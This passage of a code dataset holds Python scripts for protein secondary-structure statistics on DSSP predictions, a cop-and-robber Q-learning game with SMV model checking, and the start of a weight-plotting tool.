DSSP3 Classes ###\\n')\n f.write(str('(C, H, E, XY): '+str(c)+' '+str(h)+' '+str(e)+' '+str(xy)+'\\n'))\n f.write('\\n')\n counts=np.array([c,h,e,xy])\n np.save(statistics_dir+'/countClasses_3',counts)\n tmp={'proportions3':counts}\n attributes.update(tmp)\n\ndef countStructures8(dict, f):\n h = 0\n e = 0\n t = 0\n s = 0\n b = 0\n ii = 0\n g = 0\n none = 0\n xy = 0\n for sample in dict.keys():\n seq = 
dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 8\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'H')\n sequence = sequence.replace('1', 'E')\n sequence = sequence.replace('2', 'I')\n sequence = sequence.replace('3', 'S')\n sequence = sequence.replace('4', 'T')\n sequence = sequence.replace('5', 'G')\n sequence = sequence.replace('6', 'B')\n sequence = sequence.replace('7', '-')\n sequence = sequence.replace('8', 'X')\n for i in range(len(sequence)):\n if(sequence[i]=='H'):\n h+=1\n elif (sequence[i] == 'I'):\n ii += 1\n elif(sequence[i]=='E'):\n e+=1\n elif (sequence[i] == 'G'):\n g += 1\n elif (sequence[i] == 'T'):\n t += 1\n elif (sequence[i] == 'S'):\n s += 1\n elif (sequence[i] == 'B'):\n b += 1\n elif (sequence[i] == '-'):\n none += 1\n elif (sequence[i] == 'Y' or sequence[i]=='X'):\n xy += 1\n else:\n raise ValueError('Unknown structure', sequence[i])\n\n f.write('\\n')\n f.write('### DSSP8 Classes ###\\n')\n f.write('(H, E, I, S, T, G, B, -, XY): '+str(h)+' '+str(e)+' '+str(ii)+' '+str(s)+' '+str(t)+' '+str(g)+' '+str(b)+' '+str(none)+' '+str(xy)+'\\n')\n f.write('\\n')\n counts=np.array([h,e,ii,s,t,g,b,none,xy])\n np.save(statistics_dir + '/countClasses_8', counts)\n tmp={'proportions8':counts}\n attributes.update(tmp)\n\ndef countStructureChains3_dict(dict, f):\n def countStructureChains3(sequence):\n C = []\n H = []\n E = []\n i = 0\n\n while i < len(sequence):\n tmp = sequence[i]\n cnt = 1\n\n if (i < len(sequence) - 1):\n while (sequence[i + 1] == tmp):\n cnt += 1\n i = i + 1\n if (i == (len(sequence) - 1)):\n break\n if (tmp == 'C'):\n C.insert(0, cnt)\n elif (tmp == 'H'):\n H.insert(0, cnt)\n elif (tmp == 'E'):\n E.insert(0, cnt)\n i = i + 1\n\n matrix = np.zeros((max(len(np.bincount(C)), len(np.bincount(H)), len(np.bincount(E))), 3), dtype=int)\n counts = pd.DataFrame(matrix,\n columns=['C', 'H', 'E'],\n index=[np.arange(max(len(np.bincount(C)), len(np.bincount(H)), len(np.bincount(E))))])\n\n for i in range(len(np.bincount(C))):\n counts['C'][i] = np.bincount(C)[i]\n for i in range(len(np.bincount(H))):\n counts['H'][i] = np.bincount(H)[i]\n for i in range(len(np.bincount(E))):\n counts['E'][i] = np.bincount(E)[i]\n\n return counts, C, H, E\n\n C=[]\n H=[]\n E=[]\n counts_all = pd.DataFrame(np.zeros((1, 3), dtype=int),\n columns=['C', 'H', 'E'],\n index=[np.arange(1)])\n\n for sample in dict.keys():\n seq = dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 3\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'C')\n sequence = sequence.replace('1', 'H')\n sequence = sequence.replace('2', 'E')\n sequence = sequence.replace('3', 'X')\n counts_tmp, C_tmp,H_tmp,E_tmp = countStructureChains3(sequence)\n C.extend(C_tmp)\n E.extend(E_tmp)\n H.extend(H_tmp)\n counts_all = counts_all.append(counts_tmp)\n\n counts=counts_all.groupby(counts_all.index).sum()\n f.write('\\n')\n f.write('### DSSP3 Chains ###\\n')\n f.write('Average C, H, E: '+str(np.average(C))+' '+ str(np.average(H))+' '+ str(np.average(E)))\n f.write(counts.to_string())\n f.write('\\n')\n 
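# Aside: the chain lengths gathered by countStructureChains3 could equivalently be computed with run-length\n # encoding, e.g. C = [len(list(g)) for ch, g in itertools.groupby(sequence) if ch == 'C'] (itertools would\n # need to be imported); the explicit while-loop above is what this script actually uses.\n 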
counts.to_pickle(statistics_dir+'/countChains3')\n tmp={'avg3':[np.average(C), np.average(H), np.average(E)]}\n attributes.update(tmp)\n\ndef countStructureChains8_dict(dict, f):\n def countStructureChains8(sequence):\n H = []\n E = []\n I = []\n T = []\n S = []\n B = []\n G = []\n none = []\n i = 0\n\n while i < len(sequence):\n tmp = sequence[i]\n cnt = 1\n\n if (i < len(sequence) - 1):\n while (sequence[i + 1] == tmp):\n cnt += 1\n i = i + 1\n if (i == len(sequence) - 1):\n break\n if (tmp == 'H'):\n H.insert(0, cnt)\n elif (tmp == 'S'):\n S.insert(0, cnt)\n elif (tmp == 'B'):\n B.insert(0, cnt)\n elif (tmp == 'G'):\n G.insert(0, cnt)\n elif (tmp == 'T'):\n T.insert(0, cnt)\n elif (tmp == 'I'):\n I.insert(0, cnt)\n elif (tmp == '-'):\n none.insert(0, cnt)\n elif (tmp == 'E'):\n E.insert(0, cnt)\n i = i + 1\n\n matrix = np.zeros((max(len(np.bincount(H)), len(np.bincount(E)), len(np.bincount(I)),\n len(np.bincount(S)), len(np.bincount(T)), len(np.bincount(G)), len(np.bincount(B)),\n len(np.bincount(none))), 8), dtype=int)\n counts = pd.DataFrame(matrix,\n columns=['H', 'E', 'I', 'S', 'T', 'G', 'B', '-'],\n index=[np.arange(\n max(len(np.bincount(H)), len(np.bincount(E)), len(np.bincount(I)),\n len(np.bincount(S)), len(np.bincount(T)), len(np.bincount(G)),\n len(np.bincount(B)),\n len(np.bincount(none))))])\n\n for i in range(len(np.bincount(H))):\n counts['H'][i] = np.bincount(H)[i]\n for i in range(len(np.bincount(E))):\n counts['E'][i] = np.bincount(E)[i]\n for i in range(len(np.bincount(I))):\n counts['I'][i] = np.bincount(I)[i]\n for i in range(len(np.bincount(S))):\n counts['S'][i] = np.bincount(S)[i]\n for i in range(len(np.bincount(T))):\n counts['T'][i] = np.bincount(T)[i]\n for i in range(len(np.bincount(G))):\n counts['G'][i] = np.bincount(G)[i]\n for i in range(len(np.bincount(none))):\n counts['-'][i] = np.bincount(none)[i]\n for i in range(len(np.bincount(B))):\n counts['B'][i] = np.bincount(B)[i]\n return counts, H, E, I, S, T, G, B, none\n\n H = []\n E = []\n I = []\n T = []\n S = []\n B = []\n G = []\n none = []\n counts_all = pd.DataFrame(np.zeros((1, 8), dtype=int),\n columns=[ 'H', 'E', 'I', 'S', 'T', 'G', 'B', '-'],\n index=[np.arange(1)])\n for sample in dict.keys():\n seq = dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 8\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'H')\n sequence = sequence.replace('1', 'E')\n sequence = sequence.replace('2', 'I')\n sequence = sequence.replace('3', 'S')\n sequence = sequence.replace('4', 'T')\n sequence = sequence.replace('5', 'G')\n sequence = sequence.replace('6', 'B')\n sequence = sequence.replace('7', '-')\n sequence = sequence.replace('8', 'X')\n counts_tmp, H_tmp, E_tmp, I_tmp, S_tmp, T_tmp, G_tmp, B_tmp, none_tmp = countStructureChains8(sequence)\n E.extend(E_tmp)\n H.extend(H_tmp)\n I.extend(I_tmp)\n S.extend(S_tmp)\n T.extend(T_tmp)\n B.extend(B_tmp)\n G.extend(G_tmp)\n none.extend(none_tmp)\n counts_all = counts_all.append(counts_tmp)\n\n counts=counts_all.groupby(counts_all.index).sum()\n f.write('\\n')\n f.write('### DSSP8 Chains ###\\n')\n f.write('Average H, E, I, S, T, G, B, -: '+ str(np.average(H))+' '+ str(np.average(E))+' '+ str(np.average(I))+' '+ str(np.average(S))+' '+\n str(np.average(T))+' '+str(np.average(G))+' '+str(np.average(B))+' '+str(np.average(none))+'\\n')\n 
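# Portability note: DataFrame.append was removed in pandas 2.0; on newer pandas the accumulation above\n # would need counts_all = pd.concat([counts_all, counts_tmp]) instead.\n 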
f.write(counts.to_string())\n f.write('\\n')\n counts.to_pickle(statistics_dir+'/countChains8')\n\n tmp={'avg8':[np.average(H), np.average(E),np.average(I),np.average(S),np.average(T),np.average(G),np.average(B),np.average(none)]}\n attributes.update(tmp)\n\ndef countAminoAcidsPerStruct_dict(dict3, dict8, f):\n def countAminoAcidsPerStruct8(seq, struct):\n matrix = np.zeros((9, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # # 0:H, 1:E, 2:I, 3:S, 4:T, 5:G, 6:B, 7:-\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(9)])\n for i in range(len(seq)):\n if (struct[i] == 'H'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][0] += 1\n else:\n aa_counts['Else'][0] += 1\n elif (struct[i] == 'E'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][1] += 1\n else:\n aa_counts['Else'][1] += 1\n elif (struct[i] == 'I'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][2] += 1\n else:\n aa_counts['Else'][2] += 1\n elif (struct[i] == 'S'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][3] += 1\n else:\n aa_counts['Else'][3] += 1\n elif (struct[i] == 'T'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][4] += 1\n else:\n aa_counts['Else'][4] += 1\n elif (struct[i] == 'G'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][5] += 1\n else:\n aa_counts['Else'][5] += 1\n elif (struct[i] == 'B'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][6] += 1\n else:\n aa_counts['Else'][6] += 1\n elif (struct[i] == '-'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][7] += 1\n else:\n aa_counts['Else'][7] += 1\n else:\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][8] += 1\n else:\n aa_counts['Else'][8] += 1\n return aa_counts\n\n def countAminoAcidsPerStruct3(seq, struct):\n matrix = np.zeros((4, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # 0:C,1:H,2:E,3:XY\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(4)])\n for i in range(len(seq)):\n if (struct[i] == 'C'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][0] += 1\n else:\n aa_counts['Else'][0] += 1\n elif (struct[i] == 'H'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][1] += 1\n else:\n aa_counts['Else'][1] += 1\n elif (struct[i] == 'E'):\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][2] += 1\n else:\n aa_counts['Else'][2] += 1\n else:\n if (seq[i] in aa_counts.keys()):\n aa_counts[seq[i]][3] += 1\n else:\n aa_counts['Else'][3] += 1\n return aa_counts\n\n matrix = np.zeros((4, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # 0:C,1:H,2:E,3:XY\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P', 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(4)])\n\n for sample in dict3.keys():\n seq = dict3[sample][0]\n struct = dict3[sample][1]\n aa_counts_tmp=countAminoAcidsPerStruct3(seq,struct)\n aa_counts=aa_counts.append(aa_counts_tmp)\n\n counts = aa_counts.groupby(aa_counts.index).sum()\n f.write('\\n')\n f.write('### TYPE OF AMINO ACIDS PER STRUCTURE CLASS DSSP3 ###\\n')\n f.write(counts.to_string())\n f.write('\\n')\n np.save(statistics_dir + '/countAAs3', np.array(counts))\n\n matrix = np.zeros((9, 21), dtype=int)\n aa_counts = pd.DataFrame(matrix, # 0:C,1:H,2:E,3:XY\n columns=['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P',\n 'S',\n 'T',\n 'W', 'Y', 'V', 'Else'],\n index=[np.arange(9)])\n\n for sample in 
dict8.keys():\n seq = dict8[sample][0]\n struct = dict8[sample][1]\n aa_counts_tmp = countAminoAcidsPerStruct8(seq, struct)\n aa_counts=aa_counts.append(aa_counts_tmp)\n\n counts=aa_counts.groupby(aa_counts.index).sum()\n f.write('\\n')\n f.write('### TYPE OF AMINO ACIDS PER STRUCTURE CLASS DSSP8 ###\\n')\n f.write(counts.to_string())\n f.write('\\n')\n np.save(statistics_dir+'/countAAs8',np.array(counts))\n\n\ndef countDistanceBetweenBetaSheets_dict(dict, f):\n def countDistanceBetweenBetaSheets(sequence):\n dist = []\n i = 0\n tmp = 0\n while i < len(sequence):\n if ((sequence[i] == 'B' or sequence[i] == 'E') and tmp > 0):\n dist.append(tmp)\n tmp = 0\n else:\n tmp += 1\n i += 1\n if (len(dist) > 0):\n del dist[0]\n\n # print('beta dist:', dist)\n return dist\n\n dist=[]\n for sample in dict.keys():\n seq = dict[sample][0].cpu().numpy()[0]\n original_len = dict[sample][1].cpu().numpy()\n mask = dict[sample][2].cpu().numpy()[0]\n mask = mask[:original_len]\n xy_idx = np.where(mask == 0.0)\n seq[xy_idx] = 3\n sequence = ''\n for i in seq:\n sequence += str(i)\n sequence = sequence[:original_len]\n sequence = sequence.replace('0', 'C')\n sequence = sequence.replace('1', 'H')\n sequence = sequence.replace('2', 'E')\n seq = sequence.replace('3', 'X')\n\n dist_tmp=countDistanceBetweenBetaSheets(seq)\n dist=dist+dist_tmp\n\n f.write('\\n')\n f.write('### AVG DISTANCE BETWEEN BETA SHEETS ###\\n')\n f.write(str(np.average(dist)))\n f.write('\\n')\n\ndef analyseFlex(dict):\n flex_avgs=[]\n three_bins=[0,0,0]\n for sample in dict.keys():\n flex=dict[sample][3]\n flex_avgs.append(np.average(flex))\n\n for f in flex:\n if(f<=-1):\n three_bins[0]+=1\n elif (f > -1 and f< 1):\n three_bins[1] += 1\n elif (f >= 1):\n three_bins[2] += 1\n\n flex_avgs=np.array(flex_avgs)\n three_bins=np.array(three_bins)\n np.save(statistics_dir+'/flex_avgs', flex_avgs)\n np.save(statistics_dir+'/flex_thirds', three_bins)\n tmp={'flex': three_bins}\n attributes.update(tmp)\n\ndef analyseSolvAcc(dict):\n solv_avgs = []\n four_bins = [0, 0, 0, 0]\n two_bins=[0,0]\n for sample in dict.keys():\n solv=dict[sample][2]\n solv_avgs.append(np.average(solv))\n\n for f in solv:\n if (f >= 0 and f < 0.25):\n four_bins[0] += 1\n two_bins[0] += 1\n elif (f >= 0.25 and f < 0.5):\n four_bins[1] += 1\n two_bins[0] += 1\n elif (f >= 0.5 and f < 0.75):\n four_bins[2] += 1\n two_bins[1] += 1\n elif (f >= 0.75 and f <= 1.0):\n four_bins[3] += 1\n two_bins[1] += 1\n\n solv_avgs = np.array(solv_avgs)\n four_bins = np.array(four_bins)\n two_bins = np.array(two_bins)\n np.save(statistics_dir + '/solvAcc_avgs', solv_avgs)\n np.save(statistics_dir + '/solvAcc_quarters', four_bins)\n np.save(statistics_dir + '/solvAcc_halfs', two_bins)\n\n tmp={'solvacc': two_bins}\n attributes.update(tmp)\n\n# Analyze DSSP3 predictions\nf = open('data analysis/predicted/statisticsPredicted.txt', 'w')\n\ndict3 = np.load('/home/areithmeier/log/multi4/3/DenseHybrid_protvec+scoringmatrix_3_multitask/predictedData.npy').item()\ncountStructures3(dict3, f)\n\ncountStructureChains3_dict(dict3, f)\ncountDistanceBetweenBetaSheets_dict(dict3, f)\n\n# Analyze DSSP8 predictions\nf = open('data analysis/predicted/statisticsPredicted8.txt', 'w')\ndict8 = np.load('/home/areithmeier/log/multi4/8/DenseHybrid_protvec+scoringmatrix_8_multitask/predictedData.npy').item()\ncountStructures8(dict8, f)\n\ncountStructureChains8_dict(dict8, f)\ncountDistanceBetweenBetaSheets_dict(dict8, 
f)\n\nf.close()","sub_path":"code/getStatisticsPredicted.py","file_name":"getStatisticsPredicted.py","file_ext":"py","file_size_in_byte":22796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"390403400","text":"import numpy as np\r\nimport pickle\r\nimport os\r\nimport utils\r\nfrom utils import rearrange_vector, next_positions, index_to_number\r\nfrom utils import writeSmv, runSmv\r\n\r\nBOARD_COLS = utils.BOARD_COLS\r\nBOARD_ROWS = utils.BOARD_ROWS\r\nQ_LEARNING = True\r\nPlay_Random = True\r\nDistance_Feature = False\r\n\r\n\r\n# class \"State\" holds all variables and methods related to state transformation\r\n\r\nclass State:\r\n def __init__(self, init_vec=None, p1=None, p2=None, max_turns=50, exp_rate=0):\r\n self.position = [init_vec[0], init_vec[1]]\r\n self.p1 = p1\r\n self.p2 = p2\r\n self.isEnd = False\r\n self.boardHash = None\r\n # init p1 plays first\r\n self.player_turn = 1 # 1 = Cop, -1 = Rob\r\n self.counter = 0\r\n self.max_turns = max_turns\r\n self.smv = False\r\n self.exp_rate = exp_rate\r\n self.Distance_Feature = Distance_Feature # I added a feature to help the cop converge (and win)\r\n # by choosing the next action based on distance from the robber\r\n\r\n def winner(self):\r\n if sum(self.position[1], []) in self.position[0]:\r\n return 1\r\n if self.counter > self.max_turns:\r\n return -1\r\n return None\r\n\r\n # availablePositions: helper method that returns the possible next positions\r\n\r\n def availablePositions(self):\r\n positions = next_positions(self.player_turn, self.position)\r\n return positions\r\n\r\n # get unique hash of current board state\r\n def getHash(self):\r\n self.boardHash = self.position\r\n return self.boardHash\r\n\r\n def updateState(self, action):\r\n if self.player_turn == 1:\r\n self.position = [action, self.position[1]]\r\n else:\r\n self.position = [self.position[0], [action]]\r\n # switch to another player\r\n self.player_turn = -1 if self.player_turn == 1 else 1\r\n self.counter = self.counter + 1\r\n\r\n # only when game ends\r\n def giveReward(self):\r\n result = self.winner()\r\n # Backpropagate reward\r\n if result == 1:\r\n print(\"The cop caught the rob\\n\")\r\n self.p1.feedReward(100)\r\n self.p2.feedReward(-100)\r\n elif result == -1:\r\n print(\"The rob managed to escape the cop\\n\")\r\n self.p1.feedReward(-100)\r\n self.p2.feedReward(100)\r\n else:\r\n self.p1.feedReward(0)\r\n self.p2.feedReward(0)\r\n\r\n # board reset\r\n def reset(self, a_vecs=None, l_vecs=None, num_of_players=None):\r\n self.boardHash = None\r\n self.isEnd = False\r\n self.player_turn = 1\r\n\r\n # if not Play_Random or self.counter % 20 == 0:\r\n writeSmv(num_of_players, BOARD_COLS - 1, self.p1, a_vecs, l_vecs) # Run Smv on the 20'th iteration\r\n ans, wl_r = runSmv()\r\n # else:\r\n # ans = None\r\n if ans == 'win':\r\n self.isEnd = True\r\n self.smv = True\r\n return\r\n if Play_Random or np.random.uniform(0, 1) <= self.exp_rate:\r\n idx = 0\r\n while idx == 0:\r\n idx = np.random.choice(len(a_vecs))\r\n action = a_vecs[idx]\r\n else:\r\n action = ans\r\n # pl1.states_value[wl_r] = min(-1, pl1.states_value[wl_r])\r\n\r\n c_action = int(action / 100)\r\n r_action = int(action % 100)\r\n l_action = []\r\n for i in range(int(len(str(c_action)) / 2)):\r\n n = int(str(c_action)[2 * i: 2 * i + 2])\r\n l_action.append([int(n / 10), int(n % 10)])\r\n l_action = [l_action, [[int(r_action / 10), int(r_action % 10)]]]\r\n self.position = l_action\r\n self.counter = 0\r\n\r\n def play(self, rounds=100, init_pos=None, a_vecs=None, l_vecs=None, num_of_players=None):\r\n if init_pos is not None:\r\n self.position = init_pos\r\n win_arr = [0, 0]\r\n for i in range(rounds + 1): # main loop runs \"max_games\" (CaRgame.py) times\r\n if i == 0:\r\n continue\r\n if i % 1000 == 0 and i > 0:\r\n print(\"Rounds {}\".format(i))\r\n if self.smv:\r\n print(\"End after {} rounds\".format(i))\r\n break\r\n self.showBoard(True)\r\n while not self.isEnd: # keep taking turns until the game is finished\r\n # Player 1\r\n positions = self.availablePositions()\r\n if Q_LEARNING:\r\n p1_action = self.p1.chooseAction(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n else:\r\n p1_action = self.p1.chooseAction2(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n self.updateState(sum(p1_action, []))\r\n board_hash = self.getHash()\r\n self.p1.addState(board_hash, l_vecs)\r\n self.showBoard()\r\n win = self.winner()\r\n if win is not None:\r\n self.giveReward()\r\n self.p1.reset()\r\n self.p2.reset()\r\n self.reset(a_vecs, l_vecs, num_of_players)\r\n if win == 1:\r\n win_arr[0] = win_arr[0] + 1\r\n else:\r\n win_arr[1] = win_arr[1] + 1\r\n break\r\n\r\n else:\r\n # Player 2\r\n positions = self.availablePositions()\r\n if Q_LEARNING:\r\n p2_action = self.p2.chooseAction(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n else:\r\n p2_action = self.p2.chooseAction2(positions, self.player_turn, self.position, l_vecs, win_arr)\r\n self.updateState(p2_action)\r\n board_hash = self.getHash()\r\n self.p2.addState(board_hash, l_vecs)\r\n self.showBoard()\r\n win = self.winner()\r\n if win is not None:\r\n # self.showBoard()\r\n # ended with p2 either win or draw\r\n self.giveReward()\r\n self.winner()\r\n self.p1.reset()\r\n self.p2.reset()\r\n self.reset(a_vecs, l_vecs, num_of_players)\r\n if win == 1:\r\n win_arr[0] = win_arr[0] + 1\r\n else:\r\n win_arr[1] = win_arr[1] + 1\r\n break\r\n\r\n return win_arr\r\n\r\n # play with human\r\n def play2(self):\r\n while not self.isEnd:\r\n # Player 1\r\n positions = self.availablePositions()\r\n if positions != [0]:\r\n self.showBoard()\r\n p1_action = self.p1.chooseAction(positions)\r\n # take action and update board state\r\n self.updateState(p1_action)\r\n # check whether the game has ended\r\n win = self.winner()\r\n if win is not None:\r\n if win == 1:\r\n print(self.p1.name, \"wins!\")\r\n return 1\r\n elif win == -1:\r\n print(self.p2.name, \"wins!\")\r\n return -1\r\n else:\r\n print(\"tie!\")\r\n self.reset()\r\n break\r\n\r\n else:\r\n # Player 2\r\n positions = self.availablePositions()\r\n if positions != [0]:\r\n self.showBoard()\r\n p2_action = self.p2.chooseAction(positions, self.player_turn, self.position)\r\n self.updateState(p2_action)\r\n win = self.winner()\r\n if win is not None:\r\n if win == 1:\r\n print(self.p1.name, \"wins!\")\r\n return 1\r\n elif win == -1:\r\n print(self.p2.name, \"wins!\")\r\n return -1\r\n else:\r\n print(\"tie!\")\r\n self.reset()\r\n break\r\n\r\n # showBoard: method to print the board after each action\r\n\r\n def showBoard(self, initial=False):\r\n # p1: C p2: R\r\n if initial:\r\n print(\"Initial state:\")\r\n else:\r\n print(\"Cop turn:\") if self.player_turn == -1 else print(\"Rob turn:\")\r\n a = self.position[0]\r\n b = self.position[1]\r\n # print('-----')\r\n out = []\r\n for i in range(BOARD_ROWS):\r\n out += [[]]\r\n for j in range(BOARD_COLS):\r\n out[i] += [\"-\"]\r\n for ap in a:\r\n out[ap[0]][ap[1]] = 'C'\r\n if sum(b, []) not in a:\r\n # if len(sum(b, [])) == 1:\r\n 
# b = sum(b, [])\r\n out[b[0][0]][b[0][1]] = 'R'\r\n for i in range(BOARD_ROWS):\r\n for j in range(BOARD_COLS):\r\n if i != 0 and j != 0:\r\n print(out[i][j], end=\" \")\r\n print(\"\")\r\n print('\\n')\r\n\r\n\r\nclass Player:\r\n def __init__(self, name, exp_rate=0.3):\r\n self.name = name\r\n self.states = [] # record all positions taken\r\n self.lr = 0.2\r\n self.exp_rate = exp_rate\r\n self.decay_gamma = 0.9\r\n self.states_value = {} # state -> value\r\n\r\n @staticmethod\r\n def getHash(board):\r\n boardHash = str(board.reshape(BOARD_COLS * BOARD_ROWS))\r\n return boardHash\r\n\r\n # INPUT: 1. Player class 2. possible positions as we received from \"next_positions\" (utils.py)\r\n # 3. cop / rob turn ( 1 or -1) 4. current position ( 6-digits vector)\r\n # 5. l_v = shorter version of a_v that span the board dimension\r\n # OUTPUT: The chosen action - the action that going to execute\r\n\r\n # I added the win_arr to the function calling to use it for the\r\n # distance feature implementation\r\n\r\n def chooseAction(self, positions, pl_turn, current_position, l_v, win_arr):\r\n if positions is None:\r\n return sum(current_position[np.maximum(0, -pl_turn)], [])\r\n idx = np.random.choice(len(positions)) # choose randomly index from possible actions\r\n action = positions[idx]\r\n if np.random.uniform(0, 1) <= self.exp_rate: # the main implementation of exploration rate\r\n # take random action\r\n idx = np.random.choice(len(positions))\r\n action = positions[idx]\r\n else:\r\n value_max = -999\r\n if Distance_Feature: # if we use the distance feature, initial value is set\r\n min_distance = (BOARD_ROWS - 2) * 2\r\n for p in positions:\r\n if pl_turn == 1: # cops turn\r\n cop_po = index_to_number(sum(p, []))\r\n rob_po = index_to_number(current_position[1])\r\n else:\r\n cop_po = index_to_number(current_position[0])\r\n rob_po = index_to_number([p])\r\n next_boardHash = rearrange_vector(cop_po * 100 + rob_po)\r\n if next_boardHash not in l_v:\r\n next_boardHash = utils.findEqual(next_boardHash, l_v)\r\n value = 0 if self.states_value.get(next_boardHash) is None else self.states_value.get(next_boardHash)\r\n # print(\"value\", value)\r\n if not Play_Random and pl_turn == 1 and win_arr[0] < 60 and Distance_Feature:\r\n Distance = abs((cop_po % 10) - (rob_po % 10)) + abs(int(cop_po / 10) - int(rob_po / 10))\r\n if Distance < min_distance:\r\n min_distance = Distance\r\n action = p\r\n else:\r\n if value >= value_max:\r\n value_max = value\r\n action = p\r\n\r\n # print(\"{} takes action {}\".format(self.name, action))\r\n return action\r\n\r\n @staticmethod\r\n def chooseAction2(positions, pl_turn, current_position):\r\n if positions is None:\r\n return sum(current_position[np.maximum(0, -pl_turn)], [])\r\n idx = np.random.choice(len(positions))\r\n action = positions[idx]\r\n if pl_turn == 1:\r\n opt_value = 100\r\n else:\r\n opt_value = 0\r\n\r\n # find the 2 closest\r\n for p in positions:\r\n if pl_turn == 1:\r\n cop_po = sum(p, [])\r\n rob_po = current_position[1]\r\n else:\r\n cop_po = current_position[0]\r\n rob_po = [p]\r\n cop_po_x = cop_po[0][0]\r\n cop_po_y = cop_po[0][1]\r\n rob_po_x = rob_po[0][0]\r\n rob_po_y = rob_po[0][1]\r\n dist = (cop_po_x - rob_po_x) ** 2 + (cop_po_y - rob_po_y) ** 2\r\n if pl_turn == 1:\r\n if dist < opt_value:\r\n opt_value = dist\r\n action = p\r\n else:\r\n if dist > opt_value:\r\n opt_value = dist\r\n action = p\r\n return action\r\n\r\n # append a hash state\r\n def addState(self, state, l_v):\r\n state_ul = sum(state, [])\r\n res_state = 0\r\n 
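# The flattened [row, col] positions appear to be packed into a single base-100 integer: each position\r\n # becomes a two-digit number via index_to_number, so e.g. [[1, 2], [3, 4]] would encode to 1234\r\n # (12*100 + 34) before rearrange_vector maps it to its canonical equivalent in l_v.\r\n 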
for i in range(len(state_ul)):\r\n res_state = res_state + index_to_number([state_ul[i]]) * (100 ** (len(state_ul) - i - 1))\r\n res_state = rearrange_vector(res_state)\r\n if res_state not in l_v:\r\n res_state = utils.findEqual(res_state, l_v)\r\n self.states.append(res_state)\r\n\r\n # at the end of game, backpropagate and update states value\r\n def feedReward(self, reward):\r\n for sta in reversed(self.states):\r\n if self.states_value.get(sta) is None:\r\n self.states_value[sta] = 0\r\n self.states_value[sta] += self.lr * (self.decay_gamma * reward - self.states_value[sta])\r\n reward = self.states_value[sta]\r\n\r\n def reset(self):\r\n self.states = []\r\n\r\n def savePolicy(self, si):\r\n fw = open('policy_' + si + '_' + str(self.name), 'wb')\r\n pickle.dump(self.states_value, fw)\r\n fw.close()\r\n\r\n def loadPolicy(self, file):\r\n fr = open(file, 'rb')\r\n self.states_value = pickle.load(fr)\r\n fr.close()\r\n\r\n def savePolicyCsv(self, numberOfGames):\r\n filename = f\"tests/test_{numberOfGames}.csv\"\r\n if os.path.exists(filename):\r\n os.remove(filename)\r\n with open(filename, 'w') as f:\r\n for key in self.states_value.keys():\r\n f.write(\"%s,%s\\n\" % (key, self.states_value[key]))\r\n\r\n\r\nclass HumanPlayer:\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n @staticmethod\r\n def chooseAction(positions):\r\n while True:\r\n print(positions)\r\n # idx = int(input(\"Input your action from available positions:\"))\r\n idx = np.random.choice(len(positions))\r\n action = positions[idx]\r\n return action\r\n\r\n # append a hash state\r\n def addState(self, state):\r\n pass\r\n\r\n # at the end of game, backpropagate and update states value\r\n def feedReward(self, reward):\r\n pass\r\n\r\n def reset(self):\r\n pass\r\n","sub_path":"Class.py","file_name":"Class.py","file_ext":"py","file_size_in_byte":15237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"582233195","text":"from tools.input_tools import get_input\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom healthtools.weighttools import Weight\n\nclass Plotting:\n\n def __init__(self, dataframe):\n self.dataframe = dataframe\n\n def basic_plot(self):\n weight_df = self.dataframe\n weight = weight_df['Weight']\n \n index = weight_df['Index']\n bmi = weight_df['BMI']\n\n maximum_val = weight_df['Weight'].max()\n minimum_val = weight_df['Weight'].min()\n \n dates = [d for d in 